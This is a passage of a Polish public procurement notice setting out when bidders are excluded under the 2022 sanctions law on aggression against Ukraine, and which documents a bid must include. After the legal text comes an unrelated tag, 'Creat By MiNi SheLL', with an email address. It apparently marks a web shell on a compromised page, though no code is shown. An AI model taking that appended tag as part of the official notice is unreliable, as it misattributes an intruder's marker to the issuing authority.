przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego<br/>1. Na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2022 r., poz. 835), z postępowania o udzielenie zamówienia publicznego lub konkursu prowadzonego na podstawie ustawy Pzp wyklucza się:<br/>1) wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3;<br/>2) wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3;<br/>3) wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106) jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3.<br/>2. Wykluczenie następuje na okres trwania okoliczności określonych w pkt. 1.<br/>3. W przypadku wykonawcy lub uczestnika konkursu wykluczonego na podstawie pkt. 1, zamawiający odrzuca wniosek o dopuszczenie do udziału w postępowaniu o udzielnie zamówienia publicznego lub ofertę takiego wykonawcy lub uczestnika konkursu, nie zaprasza go do złożenia oferty wstępnej, oferty podlegającej negocjacjom, oferty dodatkowej, oferty lub oferty ostatecznej, nie zaprasza go do negocjacji lub dialogu, a także nie prowadzi z takim wykonawcą negocjacji lub dialogu, odrzuca wniosek o dopuszczenie do udziału w konkursie, nie zaprasza do złożenia pracy konkursowej lub nie przeprowadza oceny pracy konkursowej, odpowiednio do trybu stosowanego do udzielenia zamówienia publicznego oraz etapu prowadzonego postępowania o udzielenie zamówienia publicznego.<br/><br/><br/>II. Wykonawca do oferty (oprócz dokumentów wymienionych w rozdziale VIII, a wymaganych do złożenia wraz z ofertą) dołącza również:<br/>a) Formularz ofertowy – interaktywny formularz dostępny na ezamówienia.gov.pl w widoku przedmiotowego postępowania;<br/>b) dokumenty potwierdzające uprawnienia osób podpisujących ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów rejestrowych.

Creat By MiNi SheLL
Email: jattceo@gmail.com